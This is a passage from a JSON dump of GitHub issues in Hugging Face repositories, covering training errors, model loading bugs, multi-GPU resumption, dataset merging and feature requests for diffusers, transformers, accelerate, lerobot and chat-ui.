\\\r\n --dataset_name=\"StudentYannik/v1-prepared-cn\" \\\r\n --resolution=512 \\\r\n --learning_rate=1e-5 \\\r\n --max_train_steps=10000 \\\r\n --train_batch_size=4 \\\r\n --num_train_epochs=10 \\\r\n --gradient_accumulation_steps=4\n\n### Logs\n\n```shell\n11/29/2024 14:35:32 - INFO - __main__ - Distributed environment: NO\r\nNum processes: 1\r\nProcess index: 0\r\nLocal process index: 0\r\nDevice: cuda\r\n\r\nMixed precision type: no\r\n\r\nYou set `add_prefix_space`. The tokenizer needs to be converted from the slow tokenizers\r\nYou are using a model of type clip_text_model to instantiate a model of type . This is not supported for all configurations of models and can yield errors.\r\nYou are using a model of type clip_text_model to instantiate a model of type . This is not supported for all configurations of models and can yield errors.\r\nYou are using a model of type t5 to instantiate a model of type . This is not supported for all configurations of models and can yield errors.\r\n{'base_image_seq_len', 'base_shift', 'max_image_seq_len', 'use_beta_sigmas', 'invert_sigmas', 'use_karras_sigmas', 'use_dynamic_shifting', 'max_shift', 'use_exponential_sigmas'} was not found in config. Values will be initialized to default values.\r\nDownloading shards: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 2/2 [00:00<00:00, 12539.03it/s]\r\nLoading checkpoint shards: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 2/2 [00:09<00:00, 4.92s/it]\r\n{'mid_block_add_attention'} was not found in config. Values will be initialized to default values.\r\n{'dual_attention_layers', 'qk_norm'} was not found in config. Values will be initialized to default values.\r\n11/29/2024 14:35:54 - INFO - __main__ - Initializing controlnet weights from transformer\r\n{'dual_attention_layers', 'pos_embed_type', 'qk_norm', 'use_pos_embed', 'force_zeros_for_pooled_projection'} was not found in config. Values will be initialized to default values.\r\n11/29/2024 14:36:14 - INFO - __main__ - ***** Running training *****\r\n11/29/2024 14:36:14 - INFO - __main__ - Num examples = 150\r\n11/29/2024 14:36:14 - INFO - __main__ - Num batches each epoch = 38\r\n11/29/2024 14:36:14 - INFO - __main__ - Num Epochs = 1000\r\n11/29/2024 14:36:14 - INFO - __main__ - Instantaneous batch size per device = 4\r\n11/29/2024 14:36:14 - INFO - __main__ - Total train batch size (w. parallel, distributed & accumulation) = 16\r\n11/29/2024 14:36:14 - INFO - __main__ - Gradient Accumulation steps = 4\r\n11/29/2024 14:36:14 - INFO - __main__ - Total optimization steps = 10000\r\nSteps: 0%| | 0/10000 [00:00\r\n main(args)\r\n File \"/home/xxxx/repos/control-net/diffusers/examples/controlnet/train_controlnet_sd3.py\", line 1278, in main\r\n control_block_res_samples = controlnet(\r\n File \"/home/xxxx/repos/control-net/.venv/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 1736, in _wrapped_call_impl\r\n return self._call_impl(*args, **kwargs)\r\n File \"/home/xxxx/repos/control-net/.venv/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 1747, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"/home/xxxx/repos/control-net/diffusers/src/diffusers/models/controlnets/controlnet_sd3.py\", line 365, in forward\r\n hidden_states = hidden_states + self.pos_embed_input(controlnet_cond)\r\n File \"/home/xxxx/repos/control-net/.venv/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 1736, in _wrapped_call_impl\r\n return self._call_impl(*args, **kwargs)\r\n File \"/home/xxxx/repos/control-net/.venv/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 1747, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"/home/xxxx/repos/control-net/diffusers/src/diffusers/models/embeddings.py\", line 266, in forward\r\n latent = self.proj(latent)\r\n File \"/home/xxxx/repos/control-net/.venv/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 1736, in _wrapped_call_impl\r\n return self._call_impl(*args, **kwargs)\r\n File \"/home/xxxx/repos/control-net/.venv/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 1747, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"", "url": "https://github.com/huggingface/diffusers/issues/10055", "state": "open", "labels": [ "bug", "stale" ], "created_at": "2024-11-29T13:46:29Z", "updated_at": "2025-02-03T15:03:46Z", "comments": 17, "user": "Putzzmunta" }, { "repo": "huggingface/diffusers", "number": 10050, "title": "Is there any img2img KDiffusion equivalent of StableDiffusionKDiffusionPipeline?", "body": "### Model/Pipeline/Scheduler description\n\nI'm working on result alignment between diffusers and A1111 webui. \r\nIn txt2img scene, I can achieve via `StableDiffusionKDiffusionPipeline`, refer to https://github.com/huggingface/diffusers/issues/3253. \r\nBut in img2img scene, is there any KDiffusion pipeline equivalent?\r\n\r\nI'm also trying to implement this by merging `StableDiffusionKDiffusionPipeline` and `StableDiffusionImg2ImgPipeline` together.\r\nAny clarification and help is appreciated.\n\n### Open source status\n\n- [ ] The model implementation is available.\n- [ ] The model weights are available (Only relevant if addition is not a scheduler).\n\n### Provide useful links for the implementation\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/10050", "state": "open", "labels": [ "stale" ], "created_at": "2024-11-29T07:47:11Z", "updated_at": "2024-12-29T15:03:05Z", "comments": 2, "user": "juju812" }, { "repo": "huggingface/diffusers", "number": 10043, "title": "F5-TTS Integration", "body": "### Model/Pipeline/Scheduler description\n\nF5-TTS is a fully non-autoregressive text-to-speech system based on flow matching with Diffusion Transformer (DiT).\r\nIt has excellent voice cloning capabilities, and audio generation is of quite high quality.\n\n### Open source status\n\n- [X] The model implementation is available.\n- [X] The model weights are available (Only relevant if addition is not a scheduler).\n\n### Provide useful links for the implementation\n\nPaper - https://arxiv.org/abs/2410.06885\r\nCode - https://github.com/SWivid/F5-TTS?tab=readme-ov-file\r\nWeights - https://huggingface.co/SWivid/F5-TTS\r\n\r\nAuthor - @SWivid", "url": "https://github.com/huggingface/diffusers/issues/10043", "state": "open", "labels": [ "help wanted", "contributions-welcome" ], "created_at": "2024-11-28T11:14:18Z", "updated_at": "2025-11-02T18:46:02Z", "comments": 11, "user": "nityanandmathur" }, { "repo": "huggingface/lerobot", "number": 533, "title": "How to merge multiple recorded datasets?", "body": "Hi, Thank you so much for the automatic resume during data recording\uff0csometimes ubstable camera issues or other situations (e.g. do not have enough time to finish recording) might cause process stopping.\r\n\r\nI was wondering is there anyway to merge multiple recorded datasets? for instance I have two datasets 'cube grabbing' and 'cylinder grabbing' which were both recorded 50 episodes each and in the save environment, do you have tutorial about how to merge them into a 100-episode larger datasets? \r\n\r\nBTW, another reason for merging datasets is because storage usage is extremely high before video encoding, and record large datasets at once can be limited by storage. but merge several encoded datasets can mitigate this problem.\r\n\r\nThanks", "url": "https://github.com/huggingface/lerobot/issues/533", "state": "closed", "labels": [ "question", "dataset" ], "created_at": "2024-11-28T01:53:28Z", "updated_at": "2025-10-08T08:33:31Z", "user": "mydhui" }, { "repo": "huggingface/transformers", "number": 34981, "title": "How to Log Training Loss at Step Zero in Hugging Face Trainer or SFT Trainer?", "body": "### Feature request\n\nlog train loss on start\r\n\r\n----\r\n\r\n\u2019m using the Hugging Face `Trainer` (or `SFTTrainer`) for fine-tuning, and I want to log the training loss at step 0 (before any training steps are executed). I know there\u2019s an `eval_on_start` option for evaluation, but I couldn't find a direct equivalent for training loss logging at the beginning of training.\r\n\r\nIs there a way to log the initial training loss at step zero (before any updates) using `Trainer` or `SFTTrainer`? Ideally, I'd like something similar to `eval_on_start`.\r\n\r\nHere\u2019s what I\u2019ve tried so far:\r\n\r\n#### Solution 1: Custom Callback\r\n\r\nI implemented a custom callback to log the training loss at the start of training:\r\n\r\n\r\n```python\r\nfrom transformers import TrainerCallback\r\n\r\nclass TrainOnStartCallback(TrainerCallback):\r\n def on_train_begin(self, args, state, control, logs=None, **kwargs):\r\n # Log training loss at step 0\r\n logs = logs or {}\r\n logs[\"train/loss\"] = None # Replace None with an initial value if available\r\n logs[\"train/global_step\"] = 0\r\n self.log(logs)\r\n\r\n def log(self, logs):\r\n print(f\"Logging at start: {logs}\")\r\n wandb.log(logs)\r\n\r\n# Adding the callback to the Trainer\r\ntrainer = SFTTrainer(\r\n model=model,\r\n tokenizer=tokenizer,\r\n train_dataset=train_dataset,\r\n eval_dataset=eval_dataset,\r\n args=training_args,\r\n optimizers=(optimizer, scheduler),\r\n callbacks=[TrainOnStartCallback()],\r\n)\r\n```\r\nThis works but feels a bit overkill. It logs metrics at the start of training before any steps.\r\n\r\n#### Solution 2: Manual Logging\r\n\r\nAlternatively, I manually log the training loss before starting training:\r\n\r\n```python\r\nwandb.log({\"train/loss\": None, \"train/global_step\": 0})\r\ntrainer.train()\r\n```\r\n\r\n### Question:\r\n\r\nAre there any built-in features in `Trainer` or `SFTTrainer` to log training loss at step zero? Or is a custom callback or manual logging the best solution here? If so, are there better ways to implement this functionality? similar to the `eval_on_start` but `train_on_start`?\r\n\r\ncross: https://discuss.huggingface.co/t/how-to-log-training-loss-at-step-zero-in-hugging-face-trainer-or-sft-trainer/128188\n\n### Motivation\n\nCrucial sanity check\n\n### Your contribution\n\nyes, happy to implement this. ", "url": "https://github.com/huggingface/transformers/issues/34981", "state": "open", "labels": [ "Feature request" ], "created_at": "2024-11-28T00:24:43Z", "updated_at": "2024-11-29T07:35:28Z", "user": "brando90" }, { "repo": "huggingface/transformers.js", "number": 1055, "title": "Support for Typescript docs", "body": "### Question\n\nI have been trying to implement server side sentiment analysis using this [tutorial](https://huggingface.co/docs/transformers.js/main/en/tutorials/next#prerequisites) but its in Javascript. I looked through the docs but there seems to be no information on implementing it using Typescript. So far I have integrated Typescript but there is one error that is difficult to fix. This is what I have implemented so far:\r\n\r\npipeline.ts\r\n```ts\r\nimport { pipeline, PipelineType } from \"@huggingface/transformers\";\r\n\r\n// Use the Singleton pattern to enable lazy construction of the pipeline.\r\n// NOTE: We wrap the class in a function to prevent code duplication (see below).\r\nconst P = () => class PipelineSingleton {\r\n static task: PipelineType = 'text-classification';\r\n static model = 'Xenova/distilbert-base-uncased-finetuned-sst-2-english';\r\n static instance: PipelineSingleton | null = null;\r\n\r\n // eslint-disable-next-line @typescript-eslint/no-unsafe-function-type\r\n static async getInstance(progress_callback: Function | undefined = undefined) {\r\n if (!this.instance) {\r\n this.instance = pipeline(this.task, this.model, { progress_callback });\r\n }\r\n return this.instance;\r\n }\r\n}\r\n\r\nlet PipelineSingleton: ReturnType;\r\nif (process.env.NODE_ENV !== 'production') {\r\n // When running in development mode, attach the pipeline to the\r\n // global object so that it's preserved between hot reloads.\r\n // For more information, see https://vercel.com/guides/nextjs-prisma-postgres\r\n const globalWithPipeline = global as typeof global & { PipelineSingleton: ReturnType };\r\n\r\n if (!globalWithPipeline.PipelineSingleton) {\r\n globalWithPipeline.PipelineSingleton = P();\r\n }\r\n\r\n PipelineSingleton = globalWithPipeline.PipelineSingleton;\r\n} else {\r\n PipelineSingleton = P();\r\n}\r\nexport default PipelineSingleton;\r\n```\r\n\r\nrequest.ts\r\n```ts\r\nimport { NextResponse } from 'next/server'\r\nimport PipelineSingleton from './pipeline';\r\n\r\nexport async function GET(request: Request) {\r\n // Extract the text parameter from the query string\r\n const url = new URL(request.url);\r\n const text = url.searchParams.get('text');\r\n if (!text) {\r\n return NextResponse.json({\r\n error: 'Missing text parameter',\r\n }, { status: 400 });\r\n }\r\n // Get the classification pipeline. When called for the first time,\r\n // this will load the pipeline and cache it for future use.\r\n const classifier = await PipelineSingleton.getInstance(); // SHOWS THE ERROR - Type 'PipelineSingleton' has no call signatures.ts(2349)\r\n\r\n // Actually perform the classification\r\n const result = await classifier(text);\r\n\r\n return NextResponse.json(result);\r\n}\r\n```\r\n\r\nThe problem is in the routes.ts when calling the classifier method. Typescript shows the error: \r\n\r\n> This expression is not callable.\r\n> Type 'PipelineSingleton' has no call signatures.ts(2349)\r\n\r\n\r\nSo this probably means that my Typescript implementation is incorrect for Pipeline. Would appreciate any help on this. TIA.", "url": "https://github.com/huggingface/transformers.js/issues/1055", "state": "open", "labels": [ "question" ], "created_at": "2024-11-26T21:38:54Z", "updated_at": "2024-11-27T02:20:59Z", "user": "SadmanYasar" }, { "repo": "huggingface/datasets", "number": 7299, "title": "Efficient Image Augmentation in Hugging Face Datasets", "body": "### Describe the bug\r\n\r\n I'm using the Hugging Face datasets library to load images in batch and would like to apply a torchvision transform to solve the inconsistent image sizes in the dataset and apply some on the fly image augmentation. I can just think about using the collate_fn, but seems quite inefficient. \r\n \r\n I'm new to the Hugging Face datasets library, I didn't find nothing in the documentation or the issues here on github.\r\n\r\nIs there an existing way to add image transformations directly to the dataset loading pipeline? \r\n\r\n### Steps to reproduce the bug\r\n\r\nfrom datasets import load_dataset\r\nfrom torch.utils.data import DataLoader\r\n\r\n```python\r\ndef collate_fn(batch):\r\n images = [item['image'] for item in batch]\r\n texts = [item['text'] for item in batch]\r\n return {\r\n 'images': images,\r\n 'texts': texts\r\n }\r\n\r\ndataset = load_dataset(\"Yuki20/pokemon_caption\", split=\"train\")\r\ndataloader = DataLoader(dataset, batch_size=4, collate_fn=collate_fn)\r\n\r\n# Output shows varying image sizes:\r\n# [(1280, 1280), (431, 431), (789, 789), (769, 769)]\r\n```\r\n\r\n### Expected behavior\r\n\r\nI'm looking for a way to resize images on-the-fly when loading the dataset, similar to PyTorch's Dataset.__getitem__ functionality. This would be more efficient than handling resizing in the collate_fn.\r\n\r\n\r\n### Environment info\r\n\r\n- `datasets` version: 3.1.0\r\n- Platform: Linux-6.5.0-41-generic-x86_64-with-glibc2.35\r\n- Python version: 3.11.10\r\n- `huggingface_hub` version: 0.26.2\r\n- PyArrow version: 18.0.0\r\n- Pandas version: 2.2.3\r\n- `fsspec` version: 2024.9.0\r\n", "url": "https://github.com/huggingface/datasets/issues/7299", "state": "open", "labels": [], "created_at": "2024-11-26T16:50:32Z", "updated_at": "2024-11-26T16:53:53Z", "comments": 0, "user": "fabiozappo" }, { "repo": "huggingface/lerobot", "number": 527, "title": "Is there a `select_actions` abstraction?", "body": "This line references a `select_actions` function which doesn't seem to exist. This functionality (abstract away access to the future action queue, instead of just returning the first action) would be useful - did it use to / will it exist?\r\nhttps://github.com/huggingface/lerobot/blob/96c7052777aca85d4e55dfba8f81586103ba8f61/lerobot/common/policies/act/modeling_act.py#L102", "url": "https://github.com/huggingface/lerobot/issues/527", "state": "closed", "labels": [ "question", "policies", "stale" ], "created_at": "2024-11-26T14:22:31Z", "updated_at": "2025-10-08T08:33:51Z", "user": "genemerewether" }, { "repo": "huggingface/diffusers", "number": 10025, "title": "attention mask for transformer Flux", "body": "### Describe the bug\r\n\r\nIs it possible to get back the `attention_mask` argument in the flux attention processor \r\n\r\n```\r\nhidden_states = F.scaled_dot_product_attention(query, key, value, dropout_p=0.0, is_causal=False,attn_mask=attention_mask)\r\n```\r\n\r\nhttps://github.com/huggingface/diffusers/blob/main/src/diffusers/models/attention_processor.py#L1910\r\n\r\nin order to tweak things a bit ? otherwise the argument `attention_mask` is unused.\r\n\r\nThanks a lot \r\n\r\n### Reproduction\r\n\r\npip install diffusers\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\nUbuntu\r\n\r\n### Who can help?\r\n\r\n@yiyixuxu @sayakpaul @DN6 @asomoza ", "url": "https://github.com/huggingface/diffusers/issues/10025", "state": "closed", "labels": [ "bug" ], "created_at": "2024-11-26T08:51:20Z", "updated_at": "2024-12-05T00:22:37Z", "comments": 19, "user": "christopher5106" }, { "repo": "huggingface/accelerate", "number": 3263, "title": "How to load checkpoint shards one by one to avoid OOM error?", "body": "### System Info\r\n\r\n```Shell\r\n- `Accelerate` version: 1.1.0\r\n- Platform: Linux-5.10.112-005.ali5000.al8.x86_64-x86_64-with-glibc2.17\r\n- `accelerate` bash location: /home/admin/anaconda3/envs/llama_factory/bin/accelerate\r\n- Python version: 3.10.14\r\n- Numpy version: 1.26.4\r\n- PyTorch version (GPU?): 2.4.1+cu121 (True)\r\n- PyTorch XPU available: False\r\n- PyTorch NPU available: False\r\n- PyTorch MLU available: False\r\n- PyTorch MUSA available: False\r\n- System RAM: 128.00 GB\r\n- GPU type: NVIDIA H20\r\n- `Accelerate` default config:\r\n - compute_environment: LOCAL_MACHINE\r\n - distributed_type: MULTI_GPU\r\n - mixed_precision: no\r\n - use_cpu: False\r\n - debug: False\r\n - num_processes: 8\r\n - machine_rank: 0\r\n - num_machines: 1\r\n - gpu_ids: all\r\n - rdzv_backend: static\r\n - same_network: True\r\n - main_training_function: main\r\n - enable_cpu_affinity: False\r\n - downcast_bf16: no\r\n - tpu_use_cluster: False\r\n - tpu_use_sudo: False\r\n - tpu_env: []\r\n```\r\n\r\n\r\n### Information\r\n\r\n- [ ] The official example scripts\r\n- [X] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\r\n- [X] My own task or dataset (give details below)\r\n\r\n### Reproduction\r\n\r\nMy code can run on 1/2/3/4 GPU(s), but errors occur when I try to use more GPUs.\r\n\r\nThe command I use :\r\n`accelerate launch --multi_gpu --gpu_ids 0,1,2,3,4,5,6,7,8 --num_processes 8 --main_process_port 2525 ./train_args_multi.py --batch_size 4 --save_name tmp_model_multi`\r\n\r\nThe code where errors occur:\r\n```\r\n accelerator = Accelerator()\r\n device = accelerator.device\r\n print('Device: ', device)\r\n\r\n model = MyModel(path=path, device=device).to(device)\r\n\r\n random.seed(seed)\r\n torch.manual_seed(seed)\r\n np.random.seed(seed)\r\n\r\n train_data, train_loader = data_provider(train_data_path, batch_size, num_workers=num_workers, flag='train')\r\n test_data, test_loader = data_provider(test_data_path, batch_size, num_workers=num_workers, flag='test')\r\n \r\n model_optim = optim.Adam(trained_parameters, lr=learning_rate)\r\n \r\n print('Preparing for accelerator...')\r\n model, model_optim, train_loader, test_loader = accelerator.prepare(model, model_optim, train_loader, test_loader)\r\n```\r\n\r\n### Expected behavior\r\n\r\nErrors occur when loading checkpoint shards (as the bar shows below):\r\n```\r\n$accelerate launch --multi_gpu --num_processes 8 --gpu_ids 0,1,2,3,4,5,6,7 --main_process_port 25252 ./train_args_multi.py --batch_size 4 --save_name tmp_model_multi\r\nDevice: cuda:0 \r\nDevice: cuda:6 \r\nLoading checkpoint shards: 0%| | 0/4 [00:00\r\n------------------------------------------------------\r\nRoot Cause (first observed failure):\r\n[0]:\r\n time : 2024-11-26_16:17:47\r\n host : pe-resource-pool033093226243.center\r\n rank : 5 (local_rank: 5)\r\n exitcode : -9 (pid: 84403)\r\n error_file: \r\n traceback : Signal 9 (SIGKILL) received by PID 84403\r\n======================================================\r\n(llama_factory)\r\n```\r\n\r\nI found that the memory ran out (not CUDA memory) when loading the models b", "url": "https://github.com/huggingface/accelerate/issues/3263", "state": "closed", "labels": [], "created_at": "2024-11-26T08:25:37Z", "updated_at": "2025-01-06T15:06:50Z", "user": "amoyplane" }, { "repo": "huggingface/lerobot", "number": 525, "title": "Train a RL agent (without initial dataset)", "body": "Hi,\r\n\r\nI'm currently working on trying to integrate the following environment in the repo : https://github.com/perezjln/gym-lowcostrobot\r\nI would like to use it for learning a RL agent in sim and try it out on the real robot after.\r\nHowever, the current training script requires to have a local or online pre-recorded dataset. Is there a way to avoid this and pass an option to not load a dataset ? \r\n\r\nThank you in advance", "url": "https://github.com/huggingface/lerobot/issues/525", "state": "closed", "labels": [ "enhancement", "question", "simulation" ], "created_at": "2024-11-25T20:02:38Z", "updated_at": "2025-04-07T16:19:01Z", "user": "alexcbb" }, { "repo": "huggingface/chat-ui", "number": 1592, "title": "Add Markdown support for user messages", "body": "## Describe your feature request\r\n\r\nIn pr #1562 , a WSIWYG editor has been added to the text input area, however, when a text is sent, it is displayed in unrendered markdown. The idea is to use `marked` to conditionally render certain elements in the user's sent message into markdown, and leave others untouched.\r\n\r\nThe WSIWYG editor currently converts the following into markdown:\r\n- bold\r\n- italic\r\n- code blocks\r\n- code spans\r\n\r\nThe sent user messages should display those specific elements converted into markdown, and leave the rest untouched and unconverted, such as headings.\r\n\r\n## Screenshots\r\n\r\nAn example of how a user message is currently displayed:\r\n\r\n![image](https://github.com/user-attachments/assets/71ab2877-28c8-4676-a06a-ac403e101fac)\r\n\r\n\r\n## Implementation idea\r\n\r\nThe idea is to create a custom `renderer` which might be done using `marked` to be used when the message sender is the `user`. \r\n\r\nThe renderer allows certain modifications, such as explicitly specifying what it should and should not convert, something like:\r\n\r\n```typescript\r\n\tconst renderer = new marked.Renderer();\r\n\r\n\trenderer.list = (body, _ordered) => {\r\n\t\treturn body;\r\n\t};\r\n\trenderer.heading = (text: string, _level: number) => {\r\n\t\treturn text;\r\n\t};\r\n\t// continue to disable unwanted features\r\n\r\n\t// enable what we need\r\n\trenderer.code = (code: string) => `
${code}
`;\r\n\trenderer.codespan = (text: string) => `${text}`;\r\n\trenderer.strong = (text: string) => `${text}`;\r\n\trenderer.em = (text: string) => `${text}`;\r\n```\r\n\r\nHowever any other implementation ideas are welcome!\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/1592", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-11-25T17:26:10Z", "updated_at": "2024-11-27T20:42:19Z", "comments": 2, "user": "Mounayer" }, { "repo": "huggingface/accelerate", "number": 3260, "title": "How to Properly Resume Multi-GPU Training with accelerate launch Without OOM or Loss Issues?", "body": "I encountered an issue while running multi-GPU training using `accelerate launch`. I am using 4 GPUs for training, and during the process, I save my model state using:\r\n\r\n```python\r\naccelerator.save_state(state_path)\r\n```\r\n\r\nLater, I attempt to resume training by loading the model parameters with:\r\n\r\n```python\r\naccelerator.load_state(state_path)\r\n```\r\n\r\nHowever, when I start training again, I observe multiple strange processes on the first GPU, which causes an OOM (out of memory) error, as shown in the attached figure.\r\n\r\nTo address this, I tried adding the following line before:\r\n\r\n```python\r\naccelerator.load_state(state_path)\r\n```\r\n\r\nThe updated code looks like this:\r\n\r\n```python\r\nif self.accelerator.is_main_process:\r\n self.accelerator.load_state(state_path)\r\n```\r\n\r\nI then used:\r\n\r\n```python\r\naccelerator.wait_for_everyone()\r\n```\r\n\r\nafterward to synchronize the model state across all four GPUs. While this resolved the issue of multiple processes on the first GPU, the model's loss increases significantly. It seems that the trained weights are not being properly synchronized across all GPUs.\r\n\r\nCould anyone please suggest how to correctly resume training in a multi-GPU setup with `accelerate launch`, ensuring the model weights are properly loaded and synchronized across all devices? Thank you!\r\n\r\n![\u5fae\u4fe1\u56fe\u7247_20241124170918](https://github.com/user-attachments/assets/b83375b8-6da2-4b70-b7ed-2c6b6c110825)\r\n![\u5fae\u4fe1\u56fe\u7247_20241124170833](https://github.com/user-attachments/assets/b0aad650-083e-418d-bdd7-60f8e485d7bd)\r\n", "url": "https://github.com/huggingface/accelerate/issues/3260", "state": "closed", "labels": [], "created_at": "2024-11-25T17:19:06Z", "updated_at": "2025-05-29T10:26:13Z", "user": "tqxg2018" }, { "repo": "huggingface/chat-ui", "number": 1589, "title": "Models using OpenAI endpoint have caching enabled", "body": "When using models that are currently using the OpenAI endpoint type on HuggingChat (Nemotron, llama 3.2, qwen coder) they seem to have caching enabled. \n\nThis means retrying will just reload the previous response extremely quickly. This is not the intended behaviour and does not match what is happening when using the TGI endpoint.\n ", "url": "https://github.com/huggingface/chat-ui/issues/1589", "state": "closed", "labels": [ "huggingchat" ], "created_at": "2024-11-25T12:47:01Z", "updated_at": "2025-03-12T12:56:00Z", "comments": 1, "user": "nsarrazin" }, { "repo": "huggingface/diffusers", "number": 10004, "title": "how to use kohya sd-scripts flux loras with text encoder keys in diffusers?", "body": "resulting lora weights from setting train text encoder to true is incompatible with diffusers load_lora_weights. the script networks/convert_flux_lora.py does not convert the text encoder keys either.", "url": "https://github.com/huggingface/diffusers/issues/10004", "state": "open", "labels": [ "contributions-welcome" ], "created_at": "2024-11-23T20:54:30Z", "updated_at": "2025-03-16T15:39:25Z", "user": "neuron-party" }, { "repo": "huggingface/transformers.js", "number": 1050, "title": "How to lengthen the Whisper max audio length?", "body": "### Question\n\nI'm working from the [webgpu-whisper](https://github.com/huggingface/transformers.js/tree/main/examples/webgpu-whisper) demo, and I'm having a hard time lengthening the maximum audio input allowed. I made the following changes:\r\n```js\r\n-const MAX_AUDIO_LENGTH = 30; // seconds\r\n+const MAX_AUDIO_LENGTH = 120; // seconds\r\n\r\n-const MAX_NEW_TOKENS = 64;\r\n+const MAX_NEW_TOKENS = 624;\r\n```\r\n\r\nThis seems to allow for longer input, but after 30 seconds I get the following error:\r\n```\r\nAttempting to extract features for audio longer than 30 seconds. If using a pipeline to extract transcript from a long audio clip, remember to specify `chunk_length_s` and/or `stride_length_s`.\r\n```\r\n\r\nI can't seem to find where to add [stride_length_s](https://huggingface.co/docs/transformers.js/main/en/api/pipelines#pipelinesautomaticspeechrecognitionpipelinetype--code-promise--automaticspeechrecognitionoutputarray--automaticspeechrecognitionoutput----code) in the demo code, however. Could someone point me in the right direction?", "url": "https://github.com/huggingface/transformers.js/issues/1050", "state": "closed", "labels": [ "question" ], "created_at": "2024-11-22T17:50:50Z", "updated_at": "2024-11-26T03:59:03Z", "user": "stinoga" }, { "repo": "huggingface/diffusers", "number": 9996, "title": "Flux.1 cannot load standard transformer in nf4", "body": "### Describe the bug\n\nloading different flux transformer models is fine except for nf4.\r\nit works for 1% of fine-tunes provided on Huggingface, but it doesn't work for 99% standard fine-tunes available on CivitAI.\r\n\r\nexample of such model: \r\n\r\n*note* i'm using `FluxTransformer2DModel` directly as its easiest for reproduction plus majority of flux fine-tunes are provided as transformer-only, not full models. but where full model does exist, its exactly the same problem using `FluxPipeline`\n\n### Reproduction\n\n```py\r\nimport torch\r\nimport bitsandbytes as bnb\r\nimport diffusers\r\n\r\nprint(f'torch=={torch.__version__} diffusers=={diffusers.__version__} bnb=={bnb.__version__}')\r\nkwargs = { 'low_cpu_mem_usage': True, 'torch_dtype': torch.bfloat16, 'cache_dir': '/mnt/models/huggingface' }\r\nfiles = [\r\n 'flux-c4pacitor_v2alpha-f1s-bf16.safetensors',\r\n 'flux-iniverse_v2-f1d-fp8.safetensors',\r\n 'flux-copax_timeless_xplus_mix2-nf4.safetensors',\r\n]\r\n\r\nfor f in files:\r\n print(f)\r\n try:\r\n transformer = diffusers.FluxTransformer2DModel.from_single_file(f, **kwargs)\r\n print(transformer.__class__)\r\n except Exception as e:\r\n print(e)\r\n transformer = None\r\n torch.cuda.empty_cache()\r\n```\n\n### Logs\n\n```shell\nin `diffusers/loaders/single_file_utils.py:convert_flux_transformer_checkpoint_to_diffusers`\r\n\r\n\r\nq, k, v, mlp = torch.split(checkpoint.pop(f\"single_blocks.{i}.linear1.weight\"), split_size, dim=0)\r\n\r\n\r\n> RuntimeError: split_with_sizes expects split_sizes to sum exactly to 33030144 (input tensor's size at dimension 0), but got split_sizes=[3072, 3072, 3072, 12288]\n```\n\n\n### System Info\n\ntorch==2.5.1+cu124 diffusers==0.32.0.dev0 bnb==0.44.1\n\n### Who can help?\n\n@yiyixuxu @sayakpaul @DN6 @asomoza", "url": "https://github.com/huggingface/diffusers/issues/9996", "state": "open", "labels": [ "bug", "wip" ], "created_at": "2024-11-22T16:55:11Z", "updated_at": "2024-12-28T19:56:54Z", "comments": 16, "user": "vladmandic" }, { "repo": "huggingface/diffusers", "number": 9990, "title": "How to diagnose problems in training custom inpaint model", "body": "### Discussed in https://github.com/huggingface/diffusers/discussions/9989\r\n\r\n
\r\n\r\nOriginally posted by **Marquess98** November 22, 2024\r\nWhat I want to do is to perform image inpainting when the input is a set of multimodal images, using sdxl as the pre trained model. But the results are very poor now, and I cannot determine whether it is a problem with the code, dataset, pre trained model, or training parameters. \r\nThe infer code snipped is as follows:\r\n\r\n noise_scheduler = DDIMScheduler.from_pretrained(\"stable-diffusion-v1-5/stable-diffusion-v1-5\", subfolder=\"scheduler\")\r\n noise_scheduler.set_timesteps(denoise_steps, device=device)\r\n\r\n zi = vae.encode(masked_image).latent_dist.sample()\r\n # zi = vae.encode(masked_image).latent_dist.sample()\r\n zi = zi * vae.config.scaling_factor\r\n \r\n zd = vae.encode(img2).latent_dist.sample()\r\n zd = zd * vae.config.scaling_factor\r\n\r\n zi_m = vae.encode(masked_image).latent_dist.sample()\r\n zi_m = zi_m * vae.config.scaling_factor\r\n\r\n noise = torch.randn_like(zi)\r\n denoise_steps = torch.tensor(denoise_steps,dtype=torch.int32,device=device)\r\n timesteps_add, _ = get_timesteps(noise_scheduler, denoise_steps, 1.0, device, denoising_start=None)\r\n start_step = 5\r\n\r\n zi_t = noise_scheduler.add_noise(zi, noise, timesteps_add[start_step]) \r\n # mask = mask.unsqueeze(1)\r\n m = F.interpolate(mask.to(zi.dtype), size=(zi.shape[2], zi.shape[3]), \r\n mode='bilinear', align_corners=False)\r\n\r\n input_ids = dataset[\"prompt_ids\"].to(device)\r\n input_ids = input_ids.unsqueeze(0)\r\n encoder_hidden_states = text_encoder(input_ids, return_dict=False)[0]\r\n\r\n timesteps = noise_scheduler.timesteps\r\n iterable = tqdm(\r\n enumerate(timesteps),\r\n total=len(timesteps),\r\n leave=False,\r\n desc=\" \" * 4 + \"Diffusion denoising\",\r\n )\r\n # iterable = enumerate(timesteps)\r\n start_step = 1\r\n # -----------------------denoise------------------------\r\n for i, t in iterable:\r\n if i >= start_step:\r\n unet_input = torch.cat([zi_t, zi_m, zd, m], dim=1) \r\n with torch.no_grad():\r\n noise_pred = unet(unet_input, t, \r\n encoder_hidden_states)[0]\r\n zi_t = noise_scheduler.step(noise_pred, t, zi_t).prev_sample\r\n\r\n # torch.cuda.empty_cache()\r\n decode_rgb = 